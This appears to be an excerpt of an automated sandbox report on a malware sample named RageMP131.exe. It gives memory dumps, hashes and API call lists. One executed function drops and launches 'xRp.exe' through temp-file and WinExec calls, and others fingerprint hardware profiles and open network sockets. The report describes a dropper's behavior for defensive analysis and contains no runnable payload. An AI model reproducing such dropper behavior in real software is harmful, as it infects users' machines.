Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
Instruction ID: da3b1ba33f1753143414024fba99a0588d353f96338eb558944ca793f97c8aae
Opcode Fuzzy Hash: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
Instruction Fuzzy Hash: 0541D3B5900608AFCB04DF98CC45FAABBB9FF45310F14822EF91497681E774AA40CBA5

Function 00633850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006340B9
___std_exception_destroy.LIBVCRUNTIME ref: 006340D2
___std_exception_destroy.LIBVCRUNTIME ref: 00634BDD
___std_exception_destroy.LIBVCRUNTIME ref: 00634BF6

Strings

value, xrefs: 00634B03

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
Instruction ID: f7314916dd665d094b646be539a6baeb3f1de86f4bb2489a4800a81684d31477
Opcode Fuzzy Hash: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
Instruction Fuzzy Hash: 0051A1B0C00258DBDF14DFA4CC89BDEFBB6AF05304F14425DE445A7382DB746A888B95

Function 00638CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00638D11

Strings

type must be boolean, but is , xrefs: 00638E02
type must be string, but is , xrefs: 00638D78

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
Instruction ID: 249041ac510b7200d517c3c378caea50c10c8fc366fc07cbf57b6fd2f4ef2e44
Opcode Fuzzy Hash: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
Instruction Fuzzy Hash: 223127B5900288AFDB14EBA4D846FEDB7AAEF11700F10056CF41597782EF34AA44CB96

Analysis Process: RageMP131.exePID: 8104, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	252
Total number of Limit Nodes:	41

Executed Functions

Function 00B60044 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?), ref: 00B601FA
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00B60223
WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00B60252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00B60256
WinExec.KERNEL32(?,00000005), ref: 00B60262

Strings

.dll, xrefs: 00B60102
Crea, xrefs: 00B60169
catA, xrefs: 00B601AF
xRp.exe, xrefs: 00B601FD, 00B60200
Clos, xrefs: 00B60129
lstr, xrefs: 00B601A7
WinE, xrefs: 00B60110
GetM, xrefs: 00B600B6
odul, xrefs: 00B6022D
dleA, xrefs: 00B600D0
Kern, xrefs: 00B600F4
GetT, xrefs: 00B60188
el32, xrefs: 00B600FB
Writ, xrefs: 00B60148
athA, xrefs: 00B60199

Memory Dump Source

Source File: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationPathTempWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
API String ID: 789397536-2378254480
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: c175cf7e62359e322fd0410336ddb39b1901080d65975b1861dbf803efc8450c
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 0D611874D21219DBCF24DF95C884AAEB7B0FF55715F2482AAE405BB201C3789E81CB91

Function 05140442 Relevance: 1.8, APIs: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 703434012eb6bfa5a272ed4fb687aa482da8724003e61ba0076f230a100643b8
Instruction ID: 40951863d5f2c0cf4325164e1425d89a46bd06a2bf56432de2090108abc6886a
Opcode Fuzzy Hash: 703434012eb6bfa5a272ed4fb687aa482da8724003e61ba0076f230a100643b8
Instruction Fuzzy Hash: E4617EFB60C161BDB225D1432B18EFB676EE7DA730732946BF507CA506D3980E4A5831

Function 005DD620 Relevance: 6.1, APIs: 4, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 005DD64B
socket.WS2_32(?,?,?,?,?,?,006F50C8,?,?), ref: 005DD6EE
connect.WS2_32(00000000,?,?,?,?,?,006F50C8,?,?), ref: 005DD702
closesocket.WS2_32(00000000), ref: 005DD70D

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID:
API String ID: 3098855095-0
Opcode ID: 010cad729a3e4d2f05aa18a12cac2b642f3433f6b1743e6fcb46c6aa31dc04ca
Instruction ID: 48fc1ac0593a76cbf399dd50e8d94f96bb10c0504a59270e5ddcc3d899b8c9c4
Opcode Fuzzy Hash: 010cad729a3e4d2f05aa18a12cac2b642f3433f6b1743e6fcb46c6aa31dc04ca
Instruction Fuzzy Hash: 7231C6715053555BD7209F68888476BBBE5FFC9364F001B5BF9A8922D0D730990586A2

Function 051403F5 Relevance: 1.9, APIs: 1, Instructions: 352
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 5fb412544577c6bc4a84c99fbef3729bf3f7d4efd11706f97ab0c6aa64b5773f
Instruction ID: bd5cd3daca57e8ed38f81a1e41dd6185331786e1d58b5b8552a6af2e055fc212
Opcode Fuzzy Hash: 5fb412544577c6bc4a84c99fbef3729bf3f7d4efd11706f97ab0c6aa64b5773f
Instruction Fuzzy Hash: 9F616CFB60C121BDB126D1432F18EFB676EE6DA770732946BF907CA506D3980E495831

Function 0514041B Relevance: 1.8, APIs: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d01c9f24e47011cddf5d22b240c42486fcf2f8aa6649ba57d9a644ef762e80a2
Instruction ID: e4a68daff059ba137cf2f77ea077a72a0eedf9a83dafb8a84cd2eb7c47ac24d1
Opcode Fuzzy Hash: d01c9f24e47011cddf5d22b240c42486fcf2f8aa6649ba57d9a644ef762e80a2
Instruction Fuzzy Hash: 32617DFB60C165BDB225D1832B18EFB676ED7DA730732942BF907CA506D3980E4A5831

Function 051404BB Relevance: 1.8, APIs: 1, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 500fda9586cfb474e5b683846d15200593ec00ea72b83d7d821e9946fa348c67
Instruction ID: 1b27137c6cb5f36b97d5e6411b193b59f6919d883dea525db715f6c0761dddf9
Opcode Fuzzy Hash: 500fda9586cfb474e5b683846d15200593ec00ea72b83d7d821e9946fa348c67
Instruction Fuzzy Hash: 48519FFB60C125BCB229D1432B18EFB676EE7DA730732946BF507C9506D3980E4A5831

Function 0514049A Relevance: 1.8, APIs: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: fbb5d8498aab2c865004b491f1beb0022447b91bcf4f4d7ed292007909038470
Instruction ID: dea2c47422ee13fc157bda7e330eac0fcf429c4f83387a1f1242c24a4a06e404
Opcode Fuzzy Hash: fbb5d8498aab2c865004b491f1beb0022447b91bcf4f4d7ed292007909038470
Instruction Fuzzy Hash: E5518FFB64C125BCB225D1432B18EFB676EE7DA7307329467F607C9506E3940E495831

Function 051404CF Relevance: 1.8, APIs: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4ab7a6e080d062480b83ddd3d5007f0ac5c4e0914ee2ae8c552bbf938a7ef65d
Instruction ID: 760de9132b1dd84b903a643f1bef5046719ace8520916b18caf8c02f20797d95
Opcode Fuzzy Hash: 4ab7a6e080d062480b83ddd3d5007f0ac5c4e0914ee2ae8c552bbf938a7ef65d
Instruction Fuzzy Hash: 3F51D2FB60C161BDB226D1532B18AFB676EE7DA330732946BF503CE506D3880E4A5831

Function 051404AB Relevance: 1.8, APIs: 1, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6135e421f8cf9f509261164a7a5123d5a51050f93e68064cc20222dbcf8feac9
Instruction ID: 1970b7ddea205c2d4b915f40b21f64c39e43a1d213a1783bdc15b4430f1ad5e2
Opcode Fuzzy Hash: 6135e421f8cf9f509261164a7a5123d5a51050f93e68064cc20222dbcf8feac9
Instruction Fuzzy Hash: 51518FFB64C125BCB226D1432B18EFB676EE7DA7307329467F507C9506E3980E4A5831

Function 05140515 Relevance: 1.8, APIs: 1, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8616927c14762f75eb0b1236d31ad0a39708621c1f058f259ac514deab9fe64c
Instruction ID: 9e78d8d75cd60d632e5fdfddf264f3e17c287f57f7cdc06a00794e05b28c343a
Opcode Fuzzy Hash: 8616927c14762f75eb0b1236d31ad0a39708621c1f058f259ac514deab9fe64c
Instruction Fuzzy Hash: 8851A1FB20C125BDB226D1432F28EFB676EE6DA730732946BF903C9506D3940E495831

Function 05140533 Relevance: 1.8, APIs: 1, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2a08f32da3b1c2227488cdfb7fdce5f864c11a70667c985f9f4e7f47050ee8c9
Instruction ID: 33c634d8dee0fc05f30315f91f2f2fba61c0b73ccd3500dca57bd8c9b8faa9f9
Opcode Fuzzy Hash: 2a08f32da3b1c2227488cdfb7fdce5f864c11a70667c985f9f4e7f47050ee8c9
Instruction Fuzzy Hash: CC4190FB60C125BCB226D1432F18EFB676EE6DA7307329467F907C9506D3980E495831

Function 05140553 Relevance: 1.7, APIs: 1, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b53f78ac8bbe8f024e22340e242d0f7b163131f15614c00f1bd100c6481f2457
Instruction ID: caf2eda25d2b50f96228756437cc647f4ad9785995465f15ae58f0461fa7ec22
Opcode Fuzzy Hash: b53f78ac8bbe8f024e22340e242d0f7b163131f15614c00f1bd100c6481f2457
Instruction Fuzzy Hash: 3941A0FB20C125BDB226D1532B28EFB676ED7DA730732946BF903CA506D3980E495831

Function 05140546 Relevance: 1.7, APIs: 1, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8f5738729ad9b6fadf8501cc6389212beb84036b3738fcb47cae875aefe6cab6
Instruction ID: 459ef1ce5613c760afec952415ef013734770693383dad28d8fc724ad2292ec4
Opcode Fuzzy Hash: 8f5738729ad9b6fadf8501cc6389212beb84036b3738fcb47cae875aefe6cab6
Instruction Fuzzy Hash: BE41A2FB60C121BCB125D1432F28EFB676EE6DA730732946BF903C9506D7980E495831

Function 05140595 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(0000DF8D), ref: 051405AA

Memory Dump Source

Source File: 0000000E.00000002.4135898784.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5140000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 19cb4454066c78aa650faffcdde0601382bd53b2c13ae8ee470d653a829d014a
Instruction ID: a0681c256099a1af6e1c5d92045e1a6b0e7bf4795ad3acc6e81f8912b41a0a64
Opcode Fuzzy Hash: 19cb4454066c78aa650faffcdde0601382bd53b2c13ae8ee470d653a829d014a
Instruction Fuzzy Hash: 6441C1FB60C221BDB226D1432B28EFB276EE7DA3307329467F503CA506D7980E495871

Function 006B21BC Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,006A5DA7,?,00000000,00000000,00000000,?,00000000,?,0069B2D2,006A5DA7,00000000,0069B2D2,?,?), ref: 006B2341

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: cd92006eb54974801c6bbc56036a23bc73efa0b45f6ddb12cb1c80a74dcb227d
Instruction ID: 681709bf327c2b299471801f4f6cc2e6602d926d3c84edf42797dacdfd179704
Opcode Fuzzy Hash: cd92006eb54974801c6bbc56036a23bc73efa0b45f6ddb12cb1c80a74dcb227d
Instruction Fuzzy Hash: 3961B7B1D0411AAFDF11DFA8C854AFE7BFBAF09304F140149E900AB215D776DA91CBA0

Function 0062ACB0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0062AE01

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction ID: 9e2ca5445aba634514ad649963c140dbc83a1039a5f065516e1cfd74149cd958
Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction Fuzzy Hash: 7F412672A005249BCF15DFA8ED806AEBBAAEF44301F1406ADF804EB301D770DE119BD6

Function 006B1832 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,006B1719,00000000,CF830579,006EFCB8,0000000C,006B17D5,006A58DD,?), ref: 006B1888

Memory Dump Source

